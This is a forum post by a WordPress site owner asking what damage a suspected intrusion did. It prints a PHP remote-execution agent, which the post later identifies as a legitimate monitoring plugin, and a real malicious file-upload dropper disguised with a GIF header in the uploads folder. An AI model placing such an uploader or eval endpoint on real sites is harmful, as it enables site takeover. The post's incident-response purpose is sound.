I saw highload on my server and looked at the apache server-status and saw a post to /2c1067813c6d8d0f28e13f0ce2c024fcbc17267b.php that was eating up 12% of my cpu. I shutdown apache, moved the file, blocked the guy in my htaccess, and now I’m wondering what damage was done. looks like the file was added 4 days ago
<?php
define('PAS_RES', 'twentycharacterhash');
define('PAS_REQ', 'anothertwentycharacterhash');
define('RSA_LEN', '256');
define('RSA_PUB', '65537');
define('RSA_MOD', '104794000726189251970535248702278838322004964525979459116994208185097637663513');
define('DEFLATE_RESPONSE_DATA', True);
header('Content-type: application/json');
error_reporting(0);
$version=2;$requestId='0';$jsonRPCVer='2.0';
if(!function_exists('property_exists'))
{
function property_exists($class, $property)
{
if(is_object($class))$vars=get_object_vars($class);
else $vars=get_class_vars($class);
return array_key_exists($property, $vars);
}
}
function senzorErrorHandler($errno, $errstr, $errfile, $errline)
{
switch ($errno)
{
case E_NOTICE:
case E_USER_NOTICE:
case E_WARNING:
case E_USER_WARNING:
return True;
case E_ERROR:
$code = 0;
break;
case E_USER_ERROR:
$code = 1;
break;
default:
$code = 2;
}
if(function_exists('json_encode'))
{
$message = "{$errstr} ({$errfile} Line: {$errline})";
$response = json_encode(array('jsonrpc' => $GLOBALS['jsonRPCVer'],'id'=>$GLOBALS['requestId'],'error'=>array('code'=>$code,'message'=> $message)));
}
else
{
$message = "{$errstr}";
$response = "{\"jsonrpc\":{$GLOBALS['jsonRPCVer']},\"id\":{$GLOBALS['requestId']},\"error\":{\"code\":{$code},\"message\":\"{$message}\"}}";
}
die($response);
}
set_error_handler("senzorErrorHandler");
if(!function_exists('json_encode'))
{
if (!file_exists("compat/json.php"))
trigger_error("#COMPAT-JSON#", E_USER_ERROR);
require_once("compat/json.php");
function json_encode($data)
{
$json = new Services_JSON();
return($json->encode($data));
}
}
if(!function_exists('json_decode'))
{
if(!file_exists("compat/json.php"))
trigger_error("#COMPAT-JSON#", E_USER_ERROR);
function json_decode($data)
{
$json = new Services_JSON();
return($json->decode($data));
}
}
if(function_exists('bcmod'))
define('BCMOD', true);
else
{
if(!file_exists("compat/array_fill.php")||!file_exists("compat/bcpowmod.php")||!file_exists("compat/biginteger.php"))
trigger_error("#COMPAT-BI#", E_USER_ERROR);
require_once("compat/array_fill.php");
require_once("compat/bcpowmod.php");
require_once("compat/biginteger.php");
}
function rsa_encrypt($message, $public_key, $modulus, $keylength, $notSigning = true)
{
$result = '';
$chunkLength = intval($keylength / 8) - 11;
for($i = 0; $i < strlen($message); $i=$i+$chunkLength)
{
$padded = add_PKCS1_padding(substr($message, $i, $chunkLength), $notSigning, intval($keylength/8));
$number = binary_to_number($padded);
$encrypted = pow_mod($number, $public_key, $modulus);
$binary = number_to_binary($encrypted, intval($keylength/8));
$result .= $binary;
}
return $result;
}
function rsa_decrypt($message, $private_key, $modulus, $keylength)
{
$result = '';
$chunkLength = intval($keylength/8);
for($i = 0; $i < strlen($message); $i=$i+$chunkLength)
{
$number = binary_to_number(substr($message, $i, $chunkLength));
$decrypted = pow_mod($number, $private_key, $modulus);
$presult = number_to_binary($decrypted, $chunkLength);
$pres = remove_PKCS1_padding($presult, $chunkLength);
if ($pres === FALSE)
return FALSE;
$result .= $pres;
}
return $result;
}
function rsa_sign($message, $private_key, $modulus, $keylength)
{
return rsa_encrypt($message, $private_key, $modulus, $keylength, false);
}
function rsa_verify($message, $signature, $public_key, $modulus, $keylength)
{
$result = false;
$result = ($message==rsa_decrypt($signature, $public_key, $modulus, $keylength));
return $result;
}
function pow_mod($p, $q, $r)
{
if(defined('BCMOD'))
{
$factors = array();
$div = $q;
$power_of_two = 0;
while(bccomp($div, "0") == 1) //BCCOMP_LARGER
{
$rem = bcmod($div, 2);
$div = bcdiv($div, 2);
if($rem) array_push($factors, $power_of_two);
$power_of_two++;
}
$partial_results = array();
$part_res = $p;
$idx = 0;
foreach($factors as $factor)
{
while($idx < $factor)
{
$part_res = bcpow($part_res, "2");
$part_res = bcmod($part_res, $r);
$idx++;
}
array_push($partial_results, $part_res);
}
$result = "1";
foreach($partial_results as $part_res)
{
$result = bcmul($result, $part_res);
$result = bcmod($result, $r);
}
return $result;
}
//Math_BigInteger implementation
$p = new Math_BigInteger($p);
$q = new Math_BigInteger($q);
$r = new Math_BigInteger($r);
$x = $p->modPow($q, $r);
return $x->toString();
}
function add_PKCS1_padding($data, $isPublicKey, $blocksize)
{
$pad_length = $blocksize - 3 - strlen($data);
if($isPublicKey)
{
$block_type = "\x02";
$padding = "";
for($i = 0; $i < $pad_length; $i++)
$padding .= chr(mt_rand(1, 255));
}
else
{
$block_type = "\x01";
$padding = str_repeat("\xFF", $pad_length);
}
return "\x00" . $block_type . $padding . "\x00" . $data;
}
function remove_PKCS1_padding($data, $blocksize)
{
#bad data length
if(strlen($data) != $blocksize) return FALSE;
if(($data[0]!="\0") || ( ($data[1] != "\x01") && ($data[1] != "\x02") )) return FALSE;
#bad padding type
$offset = strpos($data, "\0", 1);
return substr($data, $offset + 1);
}
function binary_to_number($data)
{
if(defined('BCMOD'))
{
$base = "256";
$radix = "1";
$result = "0";
for($i = strlen($data) - 1; $i >= 0; $i--)
{
$digit = ord($data{$i});
$part_res = bcmul($digit, $radix);
$result = bcadd($result, $part_res);
$radix = bcmul($radix, $base);
}
return $result;
}
//Math_BigInteger implementation
$result = new Math_BigInteger();
$p = new Math_BigInteger("0x100", 16);
$m = new Math_BigInteger("0x01", 16);
for($i=strlen($data)-1; $i>=0; $i--)
{
if(defined('MATH_BIGINTEGER_MODE') && defined('MATH_BIGINTEGER_MODE_INTERNAL') && (MATH_BIGINTEGER_MODE == MATH_BIGINTEGER_MODE_INTERNAL))
{
$d = new Math_BigInteger();
$d->value = array(ord($data[$i]));
}
else $d = new Math_BigInteger(ord($data[$i]));
$d = $d->multiply($m);
$m = $m->multiply($p);
$result = $result->add($d);
}
return $result->toString();
}
function hex_to_binary($hex, $blocksize)
{
$result = '';
for($i = 0; $i < (strlen($hex) - 1); $i = $i + 2)
$result = $result . pack('H2', substr($hex, $i, 2));
$result = pack('H'.sprintf('%d',strlen($hex)), $hex);
return str_pad($result, $blocksize, "\x00", STR_PAD_LEFT);
}
function number_to_binary($number, $blocksize)
{
if(defined('BCMOD'))
{
$base = "256";
$num = $number;
$result = "";
while($num > 0)
{
$mod = bcmod($num, $base);
$num = bcdiv($num, $base);
$result = chr($mod) . $result;
}
return str_pad($result, $blocksize, "\x00", STR_PAD_LEFT);
}
//Math_BigInteger implementation
$result = "";
$num = new Math_BigInteger($number);
$zero = new Math_BigInteger();
$divider = new Math_BigInteger("0x100",16);
while($num->compare($zero) > 0)
{
list($num, $remainder) = $num->divide($divider);
$add = $remainder->toBytes();
if($add == '') $add = "\0";
$result = $add . $result;
}
return str_pad($result, $blocksize, "\x00", STR_PAD_LEFT);
}
function rsa_sign_b64($message, $private_key, $modulus, $keylength)
{
return base64_encode(rsa_sign($message, $private_key, $modulus, $keylength));
}
function rsa_verify_b64($message, $signature, $public_key, $modulus, $keylength)
{
return rsa_verify($message, base64_decode($signature), $public_key, $modulus, $keylength);
}
function rsa_encrypt_b64($message, $public_key, $modulus, $keylength)
{
return base64_encode(rsa_encrypt($message, $public_key, $modulus, $keylength));
}
function rsa_decrypt_b64($message, $private_key, $modulus, $keylength)
{
return rsa_decrypt(base64_decode($message), $private_key, $modulus, $keylength);
}
function get_rnd_iv($iv_len)
{
$iv = '';
while ($iv_len-- > 0) $iv .= chr(mt_rand(1, 255));
return $iv;
}
function md5_encrypt($plain_text, $password, $iv_len = 16)
{
$plain_text .= "\x13";
$n = strlen($plain_text);
if ($n % 16) $plain_text .= str_repeat("\0", 16 - ($n % 16));
$i = 0;
$enc_text = get_rnd_iv($iv_len);
$iv = substr($password ^ $enc_text, 0, 512);
while ($i < $n)
{
$block = substr($plain_text, $i, 16) ^ pack('H*', md5($iv));
$enc_text .= $block;
$iv = substr($block . $iv, 0, 512) ^ $password;
$i += 16;
}
return base64_encode($enc_text);
}
function md5_decrypt($enc_text, $password, $iv_len = 16)
{
$enc_text = base64_decode($enc_text);
$n = strlen($enc_text);
$i = $iv_len;
$plain_text = '';
$iv = substr($password ^ substr($enc_text, 0, $iv_len), 0, 512);
while ($i < $n)
{
$block = substr($enc_text, $i, 16);
$plain_text .= $block ^ pack('H*', md5($iv));
$iv = substr($block . $iv, 0, 512) ^ $password;
$i += 16;
}
return preg_replace('/\\x13\\x00*$/', '', $plain_text);
}
function handleRequest($request = '')
{
if((!is_string($request))||($request==''))trigger_error("#REQUEST-EMPTY#", E_USER_ERROR);
$request = json_decode($request);
if(!is_object($request))trigger_error("#REQUEST-JSON#", E_USER_ERROR);
if( (!property_exists($request, 'jsonrpc')) ||
(!property_exists($request, 'id')) ||
(!property_exists($request, 'method')) ||
(!property_exists($request, 'params')))trigger_error("#REQUEST-JSRPC#", E_USER_ERROR);
$GLOBALS['requestId']=$request->id;
if(floatval($request->jsonrpc) != 2.0) trigger_error("#REQUEST-VERSION#", E_USER_ERROR);
$GLOBALS['jsonRPCVer']=$request->jsonrpc;
if(!property_exists($request, 'sign'))trigger_error("#REQUEST-SIG#", E_USER_ERROR);
if(property_exists($request, 'enc'))$request->params = md5_decrypt($request->params, PAS_REQ);
if(property_exists($request, 'def'))
{
if(!function_exists('gzuncompress')) trigger_error("#COMPAT-ZLIB#", E_USER_ERROR);
$request->params = gzuncompress($request->params);
}
if(!rsa_verify_b64(sha1($request->params), $request->sign, RSA_PUB, RSA_MOD, RSA_LEN))trigger_error("#REQUEST-SIG#", E_USER_ERROR);
if($request->method != "execute")trigger_error("#REQUEST-METHOD#", E_USER_ERROR);
$result = NULL;
$success = @eval('?>'.$request->params);
if($success === FALSE) trigger_error("#REQUEST-PROCESSING#", E_USER_ERROR);
$result = json_encode($result);
$response = array ('jsonrpc' => $GLOBALS['jsonRPCVer'], 'id' => $request->id);
if(function_exists('gzcompress') && DEFLATE_RESPONSE_DATA && (strlen($result) > 100))
{
$response['def'] = true;
$result = gzcompress($result, 6);
}
$result = md5_encrypt($result, PAS_RES);
$response['enc'] = true;
$response['result'] = $result;
return json_encode($response);
}
if (($_SERVER['REQUEST_METHOD'] == 'POST')&&(!empty($_SERVER['CONTENT_TYPE']))&&(preg_match('/^application\/json/i', $_SERVER['CONTENT_TYPE'])))
echo handleRequest(file_get_contents('php://input'));
I created a file in the server root
410.php
<?php header('HTTP/1.0 410 Gone'); ?>
And in my .htaccess apache file I added
RewriteEngine On
RewriteBase /
RewriteCond %{REMOTE_ADDR} ^188.138.56.125 [OR]
RewriteCond %{REMOTE_ADDR} ^188.138.56.125
RewriteRule ^.*$ 410.php [L]
I also noticed in my wp-content/uploads folder a somehash.php file with the contents
GIF89a^A^@^A^@<80>^@^@<FF><FF><FF>^@^@^@!<F9>^D^A^@^@^@^@,^@^@^@^@^A^@^A^@^@^B^BD^A^@;^@<?php $f=preg_replace('/(.*wp-content).*/i','\1',di
rname(__FILE__)).DIRECTORY_SEPARATOR.'uploads'.DIRECTORY_SEPARATOR.$_FILES['F']['name'];move_uploaded_file($_FILES['F']['tmp_name'],$f);ech
o "14qhpo"; ?>^@;
and a directory in it with 777 permissions containing my wordpress files, which I also deleted.
I’m going to reinstall my wordpress with fresh data and plugins in a clean directory, but how can I prevent this again, or better monitor for it? And what did the hacker do and how can I prevent it/ fix damage done?
I see someone else got the same hack here http://pastebin.com/k5HUythK
EDIT 11/23
Strangely, I think the first code I pasted might be a plugin I just installed websitedefender.com because now it’s sending me emails that the ‘agent is not responsive’, http://wordpress.org/extend/plugins/wp-security-scan/, http://wordpress.org/extend/plugins/websitedefender-wordpress-security/
I would have thought they would annotate that file if it was legit
There is nothing to worry about (at least for this issue), because that file and code is a standard websitedefender.com sitecheck file. I guess you uploaded that to your site and forgotten?